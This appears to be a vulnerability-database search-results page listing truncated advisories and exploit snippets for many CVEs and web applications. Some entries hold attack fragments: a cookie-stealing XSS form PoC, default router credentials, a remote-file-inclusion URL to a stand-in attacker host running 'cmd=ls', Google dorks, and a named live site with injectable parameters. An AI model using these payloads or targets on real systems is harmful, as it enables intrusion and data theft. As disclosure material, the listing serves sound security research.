56796 matches found
libxml XML实体名堆缓冲区溢出漏洞
BUGTRAQ ID: 31126 CVE ID:CVE-2008-3529 CNCVE ID:CNCVE-20083529 libxml软件包提供允许用户操控XML文件的函数库,包含有读、修改和写XML和HTML文件支持。 libxml处理畸形XML内容时存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 当libxml2处理超长XML实体名时存在基于堆的缓冲区溢出,如果应用程序链接libxml2处理不可信的畸形XML内容,可导致应用程序崩溃或任意代码执行。 XMLSoft Libxml2 2.6.31 XMLSoft Libxml2 2.6.30 XMLSoft Libxm...
DedeCms V5.1 tag.php注入漏洞
Dedecms算是使用比较广泛的PHP整站系统了,在被使用的同时系统的安全性也被人们关注 目录下的tag.php文件对变量$tag处理不当,导致注入漏洞的形成 因为可以使用“'”,所以如果条件可以的话可以直接into file得SHELL。 DedeCms V5.1 sp1 暂无 www.dedecms.com http://www.sebug.net/bbs/thread-332-1-1.html...
CA ARCserve Backup caloggerd和xdr函数目录遍历及栈溢出漏洞
BUGTRAQ ID: 29283 CVECAN ID: CVE-2008-2241,CVE-2008-2242 BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。 ARCserve Backup的caloggerd日志守护程序在处理日志消息时对提供的路径缺少检查,如果攻击者向文件附加了恶意数据的话,就可能导致在生成日志时导致目录遍历攻击。 如果向ARCserve Backup的xdrrwsstring库函数传送了超长参数的话,就可能触发栈溢出,导致执行任意指令。 Computer Associates Server Protection r...
Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities
No description provided by source. regurgitated by: meathive url: kinqpinz.info ; Tue, 05 Feb 2008 07:51:41 -0700 CVE-2008-1247 WRT54G firmware version: v1.00.9 Default LAN IP: 192.168.1.1 Default auth: user:blank - pass:admin Authorization: Basic OmFkbWlu php print base64decode"OmFkbWlu"; :admin...
Info-ZIP UnZip inflate_dynamic()函数堆破坏漏洞
BUGTRAQ ID: 28288 CVECAN ID: CVE-2008-0888 unzip是在Unix下对.zip文件格式进行解压的工具。 unzip的实现上存在漏洞,攻击者可能利用此漏洞通过诱使用户处理恶意文档提升权限。...
Mozilla Thunderbird/Seamonkey/Firefox 2.0.0.12修复多个安全漏洞
BUGTRAQ ID: 27683 CVECAN ID: CVE-2008-0412,CVE-2008-0413,CVE-2008-0414,CVE-2008-0415,CVE-2008-0417,CVE-2008-0419,CVE-2008-0591,CVE-2008-0592,CVE-2008-0593,CVE-2008-0594 Firefox/Thunderbird/SeaMonkey是Mozilla所发布的WEB浏览器和邮件/新闻组客户端。...
OpenSSL DTLS远程堆溢出漏洞
BUGTRAQ ID: 26055 CVECAN ID: CVE-2007-4995 OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。 OpenSSL的DTLS支持中存在漏洞,攻击者可以创建能够触发堆溢出的恶意客户端或服务器,导致执行任意指令。 请注意这个漏洞仅影响使用DTLS的应用程序。 OpenSSL Project OpenSSL 0.9.8f OpenSSL Project OpenSSL 0.9.8 RedHat Linux 5.0 OpenSSL Project ---------------...
WordPress MultiUser crossite scripting PoC
No description provided by source. body onLoad="document.hack.submit" form name="hack" action="http://site/wp-newblog.php" method="post" input type="hidden" name="stage" value="1" input type="hidden" name="weblogid" value='"scriptalertdocument.cookie/script' /form /body...
Mozilla Firefox 2.0.0.4多个远程安全漏洞
BUGTRAQ ID: 24946 CVECAN ID: CVE-2007-3734,CVE-2007-3735,CVE-2007-3736,CVE-2007-3737,CVE-2007-3738 Mozilla Firefox是一款流行的开源WEB浏览器。 Firefox的浏览器引擎和JavaScript引擎中存在多个内存破坏漏洞,可能允许攻击者导致浏览器崩溃。 addEventListener和setTimeout方式中的漏洞可能允许攻击者破坏浏览器的同源策略向其他站点注入脚本,访问或修改该站点的保密或敏感数据。...
LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl / \ / \ | | | | | | | | | | | / | | | | | | | ' / | | ' \ / \ | | | | || | || | | | \ | | | | / | , |/ /|| ||| |||| / | |/ INFO: Program Title LiveCMS = 3.4 SQL Injection,&nbs...
Veritas NetBackup BPCD守护程序多个远程安全漏洞
Veritas NetBackup是大型的数据备份应用系统。 Veritas NetBackup的bpcd.exe在解析提交给NetBackup Master/Media Server的超长请求时存在栈溢出漏洞,如果发送给这个进程的通讯前缀为畸形长度的话,就会触发这个溢出,导致执行任意指令。 bpcd.exe在解析提交给NetBackup Master/Media Server的超长CONNECTOPTIONS请求时存在另一个栈溢出。在解析过程中,未经长度检查便执行了拷贝操作,导致执行任意指令。...
Apple AirPort Extreme驱动Beacon帧拒绝服务漏洞
Apple Airport Extreme driver是一款MacOS系统上的无线驱动程序。 Apple Airport Extreme driver不正确处理部分beacon帧,远程攻击者可以利用漏洞对系统进行拒绝服务攻击。 目前没有详细漏洞细节提供。 Apple Airport Extreme Driver http://www.apple.com/...
Xerox WorkCentre及WorkCentre Pro多个安全漏洞
Xerox WorkCentre是一款数码打印复印一体机。 Xerox WorkCentre的ESS/Network Controller和MicroServer Web Server代码中存在多个安全漏洞,具体如下: Web用户接口上的TCP/IP用户名存在命令注入漏洞; Web用户接口上的Scan-to-mailbox文件夹名称字段存在命令注入漏洞; Web用户接口上的Microsoft Networking配置参数存在命令注入漏洞; 浏览器权限可能允许非授权访问; TFTP/BOOTP自动配置选项可能允许非授权的配置设置; 可使用HTTP而不是HTTPS发布Web服务请求;...
动力(My Power)3.51版Article_Print.asp注射漏洞
www.com.com/ArticlePrint.asp?ArticleID=未过滤.可以提交SQL查询语句.导致获得管理员用户和密码 动力My Power3.51版 下载官方最新补丁 http://www.asp163.net...
OWL Intranet Engine 0.82 (xrms_file_root) Code Execution Exploit
No description provided by source. !/usr/bin/perl use IO::Socket; print "WwwWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; print "WWwoLWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW\r\n"; print...
Attack on Pseudo-random number generator (PRNG) used in 1000 Guess, an Ethereum lottery game. (CVE-2018–12454)
Abstract An Ethereum lottery game, 1000 Guess, has a vulnerability that it generates random numbers predictable by anyone. This game decides a winner by a random number when the number of players who bet on the contract reaches to the predetermined number. The contract generates the random number...
semcms php v2.7 sql注入
...
Claymore's Dual Ethereum Miner unauth stack buffer overflow(CVE-2017-16929)
VuNote =================== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929 Version: 0.2 Date: Nov 30th, 2017 Tag: claymore dual ethereum decred crypto currency miner Overview -------- Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner Vendor: nanopool/claymore...
Libarchive zip zip_read_mac_metadata Code Execution Vulnerability(CVE-2016-1541)
SUMMARY An exploitable heap overflow vulnerability exists in the zip archive decompression functionality of libarchive. A specially crafted zip file can cause memory corruption leading to code execution. An attacker can send a malformed file to trigger this vulnerability. TESTED VERSIONS libarchi...
Moxa AWK-3131A web_runScript Header Manipulation Denial of Service Vulnerability(CVE-2016-8726)
Summary An exploitable null pointer dereference vulnerability exists in the Web Application /forms/webrunScript iwfilename functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web...
Invincea Dell Protected Workspace Protection Bypass(CVE-2016-8732)
Summary Multiple security flaws exists in InvProtectDrv.sys which is a part of Invincea Dell Protected Workspace 5.1.1-22303. Weak restrictions on the driver communication channel and additonal insufficient checks allow any application to turn off some of the protection mechanisms provided by the...
Adobe Acrobat Reader DC AcroForm PDFDocEncoding Remote Code Execution Vulnerability(CVE-2017-11263)
Summary An exploitable case of parser confusion can lead to invalid pointer arithmetic in part of code responsible for parsing AcroForm forms in the Adobe Acrobat Reader DC 2017.009.20044. A specially crafted PDF file can abuse this unchecked pointer arithmetic to access and overwrite arbitrary...
Remote Exploitation of the NeoCoolcam IP Cameras and Gateway
Foreword The Internet of Connected Things has become a massive phenomenon during the past few years and will continue to grow at an incredible pace. More than 26 billion smart devices will be on the market by 2020, Gartner estimates. We’re looking at an explosive growth, as IoT opportunities...
Nexus 9 vs. Malicious Headphones, Take Two
Nexus 9 vs. Malicious Headphones, Take Two In March 2017 we disclosed CVE-2017-0510, a critical vulnerability in Nexus 9, that allowed for quite unique an attack by malicious headphones. Interestingly, its patch was insufficient. We had responsibly reported that finding CVE-2017-0648 to Google,...
Apple iOS / MacOS Domain Socket Kernel Use-After-Free(CVE-2017-2501)
iOS/MacOS kernel uaf due to bad locking in unix domain socket file descriptor externalization unpexternalize is responsible for externalizing the file descriptors carried within a unix domain socket message. That means allocating new fd table entries in the receiver and recreating a file which...
Oracle PeopleSoft HCM 9.2 XXE Injection
Application: Oracle PeopleSoft Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55 Vendor URL: http://oracle.com Bug: XXE Reported: 23.12.2016 Vendor response: 24.12.2016 Date of Public Advisory: 18.04.2017 Reference: Oracle CPU April 2017 Author: Nadya Krivdyuk ERPScan Description 1...
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability(CVE-2016-7552)
Summary: There exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. This can result in an attacker causing a DoS or bypassing authentication. Exploitation: An attacker can use this vulnerability to bypass the authentication by...
Microsoft Windows Code injection vulnerability (DoubleAgent)
Overview We’d like to introduce a new Zero-Day technique for injecting code and maintaining persistency on a machine i.e. auto-run dubbed DoubleAgent. DoubleAgent can exploit: Every Windows version Windows XP to Windows 10 Every Windows architecture x86 and x64 Every Windows user...
Grandstream HT701 IP analog telephone adapter background of the weak password vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re class TestPOCPOCBase: vulID = '' ssvid version = '1.0' author = 'Hcamael' vulDate = '2016-11-11'...
一个Coremail的存储型XSS
简要描述: 某处 escape 姿势不对 详细说明: 目前的代码,在构造发件人时,代码如下: function getEmailDivemailAddress return '' 那么 escapeHTML 是什么呢? function var div=document.createElement"div"; var 15=document.createTextNodethis; div.appendChild15; return div.innerHTML; 这种过滤并不会过滤单引号和双引号,所以可以构造特别的字符串逃逸到双引号以外 漏洞证明: 最简单触发方式是利用 onmousexx...
Mallbuilder商城系统change_status.php id参数SQL注入漏洞
No description provided by source...
wizBank®学习管理系统任意文件下载漏洞
wizBank学习管理系统文件下载功能没有对下载的文件名称和类型进行严格检查和过滤,恶意用户可通过构造特殊的路径下载指定的文件。 wizBank学习管理系统的\www\cw\skin1\jsp\download.jsp文件的源代码如下: code 区域 ,从代码可见,没有对下载的文件名称和类型进行严格检查和过滤,恶意用户可通过构造特殊的路径下载指定的文件。...
TRS WCM parseXMLFile()函数 XXE漏洞
No description provided by source...
Discuz问卷调查专业版插件参数orderby存在SQL注入漏洞
No description provided by source...
MetInfo5.3 /include/interface/uidata.php信息泄露
MetInfo5.3中文件:/include/interface/uidata.php存在信息泄露问题。由于该模板后台存在找回管理员密码的功能 ,通过该页面可以获取后台设置的邮件密码。之后通过登录邮件系统即可重置密码。 requireonce '../common.inc.php'; requireonce ROOTPATH.'include/export.func.php'; // dump$M'config'; $data'config'=$M'config';//这个$M'config'是从数据库查出来的配置数据。 echo jsonencode$data; //直接给打印出了。。...
Mac OS X < 10.7.5, 10.8.2, 10.9.5 10.10.2 - rootpipe 本地提权漏洞
漏洞名称:Apple OS X Admin Framework 安全漏洞紧急程度:高危漏洞类型: 本地提权详细信息:Apple OS X是美国苹果(Apple)公司为Mac计算机所开发的一套专用操作系统。Apple OS X 10.10.2及之前版本的Admin Framework中的XPC实现过程中存在安全漏洞。本地攻击者可利用该漏洞绕过身份验证,获取管理员权限。 PoC exploit code for rootpipe CVE-2015-1130 Created by Emil Kvarnhammar, TrueSec Tested on OS X 10.7.5, 10.8.2,...
TerraMaster NAS 任意文件下载漏洞
No description provided by source...
一采通电子采购系统多处SQL注入漏洞#2
简要描述: 一采通电子采购系统多处SQL注入漏洞2 详细说明: google:inurl:companycglist.aspx?ComId= 1 漏洞存在于 /Products/CategoryMSelect.aspx,参数Name 例如 http://eps.umgg.com.cn/Products/CategoryMSelect.aspx?Name=树脂磨盘 2 漏洞存在于 /RAT/Product/HistoryPrice.aspx,参数kw 例如 http://eps.umgg.com.cn/RAT/Product/HistoryPrice.aspx?kw=1 3 漏洞存在于...
U-Mail v9.8.57 /getpass.php 信息泄漏漏洞
No description provided by source...
PHP-Nuke 7.x Multiple Remote File Include Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/18186/info PHP-Nuke is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to include...
mIRC 6.1 DCC SEND Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/8818/info A vulnerability has been reported to exist in the mIRC client that may allow a remote attacker to crash a vulnerable mIRC client. The condition is most likely present due to insufficient boundary checking...
TWiki TWikiUsers Remote Arbitrary Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/14834/info A remote command execution vulnerability affects the application. The revision control function of the TWikiUsers script uses the backtick shell metacharacter to construct a command line. An attacker may use a...
Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability
No description provided by source. / Microsoft Windows DoS IcmpSendEcho2Ex interrupting Author: l3D Sites: http://nullbyte.org.il, http://forums.hacking.org.il IRC: irc://irc.nix.co.il/security Email: [email protected] Tested on Windows 7 Microsoft Windows operating system is prone to a local D...
RunCMS 1.1/1.2 NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/14631/info RunCMS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. Successful exploitation...
Contra Haber Sistemi 1.0 Haber.ASP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/21626/info Contra Haber Sistemi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
Enthrallweb eClassifieds dircat.asp cid Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/21192/info eClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to...
ES CmS 0.1 - SQL Injection Vulnerability
No description provided by source. ? Exploit Title: ES CmS 0.1 Sql Injection Vulnerability Google Dork: inurl:/page.php?id= Date: 2012 Exploit Author: MR.XpR Software Link: http://es-cms.com , http://sourceforge.net/projects/escms/files/esCMS Alpha/0.1/escmsalphav01.zip Version: v.0.1 Tested on: ...
Kaillera Multiple Clients Buffer Overflow Vulnerabilities
No description provided by source. !/usr/bin/perl Exploit Title: Remote Buffer Overflows in Kaillera clients Date: 6/30/11 Author: sil3ntdre4m Software Link: Multiple: 1. Kaillera original client: An emulator to download with this client bundled with it is Project64K 0.13:...
Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7411/info A problem has been reported in Microsoft Windows. Due to improper bounds checking by the regedit.exe program, it may be possible for a local attacker to execute arbitrary code as another user. / 09/04/2003...
phpBazar <= 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities
No description provided by source. Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password:...